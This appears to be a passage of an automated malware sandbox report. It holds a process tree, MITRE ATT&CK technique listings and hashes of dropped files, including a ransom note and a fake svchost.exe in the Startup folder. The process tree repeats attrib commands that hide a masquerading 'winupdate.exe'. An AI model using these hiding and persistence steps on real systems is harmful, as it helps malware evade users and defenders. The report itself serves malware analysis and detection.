        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        10⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:352
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        10⤵
        
        PID:6880
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        11⤵
        
        PID:6508
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        11⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:7088
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        11⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:7120
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        11⤵
        
        PID:6432
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        12⤵
        
        PID:6552
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        12⤵
        Views/modifies file attributes
        
        PID:4888
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        12⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:5216
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        12⤵
        
        PID:6856
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        13⤵
        
        PID:6260
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        13⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3384
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        13⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1060
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        13⤵
        
        PID:4716
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        14⤵
        
        PID:6092
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        14⤵
        Views/modifies file attributes
        
        PID:2184
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        14⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:6368
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        14⤵
        
        PID:6872
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        15⤵
        
        PID:6892
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        15⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2744
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        15⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:6488
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        15⤵
        
        PID:6996
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        16⤵
        
        PID:4376
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        16⤵
        Sets file to hidden
        
        PID:6788
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        16⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:6576
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        16⤵
        
        PID:7464
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        17⤵
        
        PID:7756
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        17⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:7904
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        17⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:7912
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        17⤵
        
        PID:7352
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        18⤵
        
        PID:7496
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        18⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:7500
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        18⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:7548
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        18⤵
        
        PID:7640
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        19⤵
        
        PID:7696
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        19⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:8056
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        19⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:8140
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        19⤵
        
        PID:5652
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        20⤵
        
        PID:7356
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        20⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2904
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        20⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4692
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        20⤵
        
        PID:9112
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        21⤵
        
        PID:8176
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        21⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3316
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        21⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:8320
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        21⤵
        
        PID:8796
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        22⤵
        
        PID:2268
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        22⤵
        Sets file to hidden
        
        PID:8888
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        22⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:8976
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        22⤵
        
        PID:7388
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        23⤵
        
        PID:7104
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        23⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:8500
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        23⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:7116
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        23⤵
        
        PID:7396
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        24⤵
        
        PID:7460
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        24⤵
        Views/modifies file attributes
        
        PID:8324
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        24⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:9200
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        24⤵
        
        PID:7532
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        25⤵
        
        PID:7952
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        25⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:8000
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        25⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:7316
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        25⤵
        
        PID:8804
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        26⤵
        
        PID:8768
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        26⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:8104
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        26⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:7188
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        26⤵
        
        PID:8980
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        27⤵
        
        PID:6328
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        27⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:7532
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        27⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:7900
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        27⤵
        
        PID:9204
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        28⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:8628
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        28⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:8580
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        28⤵
        
        PID:7172
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        29⤵
        
        PID:8296
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        29⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:9576
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        29⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:9584
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        29⤵
        
        PID:2328
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        30⤵
        
        PID:1056
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        30⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2652
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        30⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3164
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        30⤵
        
        PID:9380
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        31⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:10204
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        31⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:9576
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        31⤵
        
        PID:10824
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        32⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:10324
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        32⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:10336
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        32⤵
        
        PID:8380
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        33⤵
        
        PID:10508
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        33⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:7140
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        33⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:9300
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        33⤵
        
        PID:7528
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        34⤵
        
        PID:10820
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        34⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:10796
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        34⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:11028
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        34⤵
        
        PID:11012
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        35⤵
        
        PID:6424
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        35⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:10716
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        34⤵
        
        PID:10844
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        33⤵
        
        PID:2916
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        30⤵
        
        PID:9940
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        29⤵
        
        PID:9412
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        27⤵
        
        PID:8808
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        26⤵
        
        PID:7372
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        25⤵
        
        PID:6064
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        24⤵
        
        PID:8164
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        23⤵
        
        PID:1564
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        22⤵
        
        PID:8432
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        21⤵
        
        PID:8112
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        20⤵
        
        PID:9144
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        19⤵
        
        PID:4728
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        18⤵
        
        PID:3516
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        17⤵
        
        PID:7368
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        16⤵
        
        PID:7568
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        15⤵
        
        PID:6152
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        14⤵
        
        PID:6444
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        13⤵
        
        PID:696
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        12⤵
        
        PID:6768
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        11⤵
        
        PID:844
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        10⤵
        
        PID:4256
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        9⤵
        
        PID:4112
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        8⤵
        
        PID:6684
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        7⤵
        
        PID:4808
      - C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        6⤵
        
        PID:6032
    - - C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        5⤵
        
        PID:5324
  - - C:\Windows\SysWOW64\notepad.exe
      C:\Windows\SysWOW64\notepad.exe
      4⤵
      PID:3452
- - C:\Windows\SysWOW64\notepad.exe
    C:\Windows\SysWOW64\notepad.exe
    3⤵
    PID:1836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6336 -ip 6336
1⤵
PID:3384

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
1⤵
PID:7884

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7700

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7844

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
PID:8080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Scripting

T1064

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe

Filesize
3.0MB

MD5
81aab57e0ef37ddff02d0106ced6b91e

SHA1
6e3895b350ef1545902bd23e7162dfce4c64e029

SHA256
a70f9e100dddb177f68ee7339b327a20cd9289fae09dcdce3dbcbc3e86756287

SHA512
a651d0a526d31036a302f7ef1ee2273bb7c29b5206c9b17339baa149dd13958ca63db827d09b4e12202e44d79aac2e864522aca1228118ba3dcd259fe1fcf717

Download Submit
C:\Program Files\Java\jdk-1.8\jre\lib\YOUR_FILES_ARE_ENCRYPTED.HTML

Filesize
4KB

MD5
54b00cdbd02a5824d8d2bf5961e62ddc

SHA1
ce2ee16e2027e1088bdfcd06921b056f7363a7b0

SHA256
4e916eed82fd107290d8d409fe9f4570074542e27be75a348457664177459a3e

SHA512
e8c72362bc8261992c088d07a4f2e69e50f262a47900042c56ad0eb07e0f74495d605dd3b0b816ce1c7ae04c886a901367f6252e2ef76c484dc02504f6101a1f

Download Submit
C:\ProgramData\svchost\vcredist2013_x64_000_vcRuntimeMinimum_x64.ico

Filesize
4KB

MD5
4b012fee667b64b53077fa218bbe0b7c

SHA1
1c0d778dd1c746cfd05b0bdac236e98bc1ca0a81

SHA256
79875bda60543b97bad582d2c8ecb0bb2c8dedc578363d1f468ab0dddc644c09

SHA512
77b8926f7490050b09c38f4965485ec732476bcd3dfc7d349738d0cab717bc69e3e9be7dbdcbdf2b4d832fbfd59eef782d75b1a4b2b2aff3c02c1194cc5a0204

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
caaacbd78b8e7ebc636ff19241b2b13d

SHA1
4435edc68c0594ebb8b0aa84b769d566ad913bc8

SHA256
989cc6f5cdc43f7bac8f6bc10624a47d46cbc366c671c495c6900eabc5276f7a

SHA512
c668a938bef9bbe432af676004beb1ae9c06f1ba2f154d1973e691a892cb39c345b12265b5996127efff3258ebba333847df09238f69e95f2f35879b5db7b7fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
7c194bbd45fc5d3714e8db77e01ac25a

SHA1
e758434417035cccc8891d516854afb4141dd72a

SHA256
253f8f4a60bdf1763526998865311c1f02085388892f14e94f858c50bf6e53c3

SHA512
aca42768dcc4334e49cd6295bd563c797b11523f4405cd5b4aeb41dec9379d155ae241ce937ec55063ecbf82136154e4dc5065afb78d18b42af86829bac6900d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e571119660b9845a539f9313efb3abcc

SHA1
0fe31f0a3f59f2031614eb985a553df005aa2264

SHA256
6eff6baf16032057de89e90cb1b301f505623618cae64c2d1c78796103813201

SHA512
0dcf55e2cbfb05181d34dd06142e8988a7a3df39137bbdff81dd4c7466c44aa3abd1bc4a350793afb3787182ac76e9d51041ae13586d0e4a73e942ef07ffc22a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d71489726f0d920edccf99e4b4fac203

SHA1
c5344afe765113ae815ec8d76f76f288efe2d8fc

SHA256
5493c7f05f039af180bf6c5ecb50d36166559897c0d423d86846d893c6af34ce

SHA512
4ad9a443edf4e3693b607868b4927fefae49355492579e7d3d2c6f4cd8b9fc47debdcce428f177b9720ab7929532a3d2d65943501b283d969e62890cef93dfd7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\1c8e29fb-bbd6-483a-961a-ebf8fad72031.tmp

Filesize
7KB

MD5
316e7ac3fed8946e539892ee197b112c

SHA1
971a210cc1ea3073c3c517a863a215179e85f3f0

SHA256
a3bc3b30a2a3e2dc10e38444281fcf23b398a66e668d71f0074d579b185c6468

SHA512
dc19039563ffdc5530cef60802f79a54d78ecf2bd1bf67157f2dd0cbfa83d1c1d2af05cb9817583c8c81a527125f8dba62be3693ac947c8a35868f3e41da0864

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
24KB

MD5
dc0ad025509c966716f971b6e0d36ee9

SHA1
64c5b5b0bc022961bcff062467df6cde579a7d5a

SHA256
ff30c58cbd4693a19a964c528b653c80ce1968b7db93a92a5ee9f3788efe4103

SHA512
3580ddfded853f05ce10d96292ae23ac2593079cb2bcedd1e5081d99e8aa54c7ec985cbbf29e5961425192a00ef639cc3969e5bc1f6450bcbbf855e3f161ea83

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
49KB

MD5
007fb5dbf7496d94e9e4a7715d4e0c29

SHA1
cfe20a62783b5ef5d2f90ee5924e198e49675fb5

SHA256
6983af502765ba203342e45c3e74b5d32b98ab7ecd1791faecf7c1a9d7734709

SHA512
92711c785a14bd326532721b63946a602eab1e5e1f87eb255452d46e9cbcf10435bc91b2f1b1b80be8792e585f20d6850a289a3c36285a54c02dad7266c6bf96

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
44KB

MD5
ac7cb774971fe710e341a3956679a059

SHA1
c0966dfe5c8957427884a25d7a455a77469531bb

SHA256
9e642e72ca78132306e93a2eff9b2e6352356ef01b85807102518beb32faf4ce

SHA512
3e46ef764f902915da29f56e813b8a9a076f4224de4c5904366201fa2426a976160af082d138adb87f8f6cc57fe8adde1a0c6c70b3e488117ef0d8d7be4af5ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
21KB

MD5
4a9866802a8e931134fce4abb391e665

SHA1
2d75faef1e2e4b37def583f339de3548c5363267

SHA256
f12148925d6d74223202b5749a596e658f1a7f2d74ff1fbc14199d81fc8aaa25

SHA512
9bfdea656fd6389586f07b5cd57f8a78570cd85a390312e697fce583206a6600b33166e58f1c2e56877e4c02a98b64b680f7cdc7624b584ab074dc222b44f0e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

Filesize
59KB

MD5
063fe934b18300c766e7279114db4b67

SHA1
d7e71855cf6e8d1e7fbaa763223857f50cd1d4bd

SHA256
8745914e0214bcd9d2e6a841f0679a81084ef3fc3d99125876bee26653f4253e

SHA512
9d0dfc21306b3a56c2ecdf1265392271969e3765e161e117c8765125b34793e24458217cf6514b364f351f47e65baaaf5856be0d13406a789f844d6ba8c7075f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

Filesize
20KB

MD5
8b2813296f6e3577e9ac2eb518ac437e

SHA1
6c8066353b4d463018aa1e4e9bb9bf2e9a7d9a86

SHA256
befb3b0471067ac66b93fcdba75c11d743f70a02bb9f5eef7501fa874686319d

SHA512
a1ed4d23dfbe981bf749c2008ab55a3d76e8f41801a09475e7e0109600f288aa20036273940e8ba70a172dec57eec56fe7c567cb941ba71edae080f2fdcc1e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

Filesize
21KB

MD5
d7226b68fa178a62fa40b95b76604a57

SHA1
5321c65be15372e3dfbe6cecc297c229f5581e85

SHA256
c907945eeb1aff6792cb5e22cae4cb2bc681a836a69bc6c6d6fd483a4a1d63db

SHA512
d2a7dfc4df92a32d45e1e7806d16abb512cdab32ddd673c54f0c9fd070765e875cc2e90355fa1af197c982f15f39f1aed007431ef31fb5c4189e655f0509a53b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

Filesize
65KB

MD5
d24650881aed8ad2afc39216e92b6fea

SHA1
1439162c251400a9a0ca1044db6036fdb0ee01a2

SHA256
ed91813341b7f0ade77ca9fb3cde65254d5381e45c424beee1fde6886e4dcfd1

SHA512
d7606678bb9046ca2b24e025a83bb418031e61811c4572e716e1dc367ce60cdc38931a324720897c0fd509dcad2dce39101770702f767e319ebf7855d5a96a93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

Filesize
151KB

MD5
da800376add972af643bd5ff723c99a5

SHA1
44fe56009c6740ec7e25e33e83a169acff4c6b6c

SHA256
bf252b560c9cc78dfa63abe0ae5caa03b83e99b1ca5fae3c9515483c57aaae3f

SHA512
292819ce339d4546d478fc0aca22ae63f4b7231f6a0aca3fbe1069d53ad09e1e3c936205cdbeb53bbedbfcbc33f3b6077f84364a150f7627f87ac091de08952d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d

Filesize
23KB

MD5
544fb04bb29f0f5788fd4c3ed2ef5f1d

SHA1
4ddddf5dbbbff39f64f3edb3431d87fb8ffbfc7e

SHA256
50881237b8ccc8f979af498f643e7823da4a71a9054ca277a200ead8daa62699

SHA512
